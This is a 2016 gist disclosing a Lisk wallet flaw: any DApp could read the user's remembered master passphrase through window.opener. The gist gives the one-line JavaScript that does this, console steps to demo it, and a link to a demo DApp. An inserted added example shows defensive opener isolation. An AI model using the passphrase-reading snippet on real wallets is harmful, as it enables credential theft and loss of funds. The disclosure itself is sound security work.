
@whitj00

whitj00/lisk.txt Secret

Last active May 26, 2016 16:27
Lisk Vulnerability Report
I would highly recommend that Lisk users not run DAPPs unless they have audited every single line of code in it beforehand, here's why:
2 months ago, I reported a vulnerability to Lisk for their bug bounty where any DAPP could access a user's master password with a single line of JS. Even though my experience with the bug bounty program was less than stellar, I won't go into that here. The main point is that Lisk has known about this bug for 2 months and has not fixed it, which poses a massive security risk to users who don't have the time, knowledge, or motivation to verify the safety of DAPPs.
In my opinion it is dangerous to release a coin with smart contracts without making sure users' funds are secure, regardless of how many warnings you give them. I am disclosing this vulnerability below, not because I want users' funds to be stolen, but because I believe it's more dangerous to have this unknown to users and known to people who may use this for malicious purposes, and I hope that making this public will encourage the Lisk team to fix the security model of DAPPs.
To access a user's password in a DAPP, you can use the following:
> var liskpass = window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase;
This is because DAPPs are not isolated in the browser from the lisk wallet, which opens up serious flaws beyond just this.
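As an added example (not code from this report and not Lisk's own code), the following shows the browser isolation step the report says is missing: a DApp window opened without an opener link has a null window.opener, so the injector lookup above has nothing to walk. The helper names, the fake windows, and the openFn / win parameters that let the functions run outside a browser are my own assumptions.

```javascript
// Added example, not code from the report or from Lisk. It shows the browser
// isolation step the report says is missing: a DApp window opened without an
// opener link cannot walk window.opener to the wallet's Angular injector.
// Assumptions (mine): the wallet launches DApps with window.open(); the
// helper names and the `openFn` / `win` parameters (which exist only so the
// logic can be exercised outside a browser) are not from the original.

// Open `url` in a new browsing context that has no window.opener.
function openDappIsolated(url, openFn = (...args) => window.open(...args)) {
  // Modern browsers honour 'noopener': the child gets opener === null and
  // window.open itself returns null, so there is no handle to leak.
  const child = openFn(url, '_blank', 'noopener,noreferrer');
  if (child === null) {
    return null;
  }
  // Older engines ignore the feature string and hand back the handle while
  // the new window is still about:blank; severing the back-reference here,
  // before the DApp document loads, has the same effect.
  child.opener = null;
  return child;
}

// Self-check a wallet's test suite can run from inside a DApp window: does
// this window's opener expose an Angular injector that knows 'userService'?
// It reports reachability only and never reads the passphrase.
function openerExposesUserService(win = window) {
  const opener = win.opener;
  if (!opener || !opener.angular || !opener.document) {
    return false;
  }
  try {
    const injector = opener.angular.element(opener.document).injector();
    return Boolean(injector && injector.has('userService'));
  } catch (err) {
    // Cross-origin opener or no Angular bootstrap on the opener: not reachable.
    return false;
  }
}
```

Opener isolation only closes the path shown in the report: a DApp served from the wallet's own origin can still reach wallet state through any same-origin channel, so serving DApps from a separate origin (or a sandboxed frame) is the fuller fix.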
If you would like to demo without creating a dapp (this method simulates opening a dapp and running the code), simply log into the lisk client (with remember password enabled) and type into the JS console:
> window.open("/");
It will open a new browser page, and in that page's console type:
> console.log(window.opener.angular.element(window.opener.document).injector().get('userService').rememberedPassphrase);
and you should see your passphrase.
If you would like to demo with an actual DAPP, you can install this:
https://whitjack.me/lisk/guestbookdapp-master.zip
which will show you your passphrase, but will not do anything else with it (you should definitely verify this code though, don't take my word for it).
~ Whit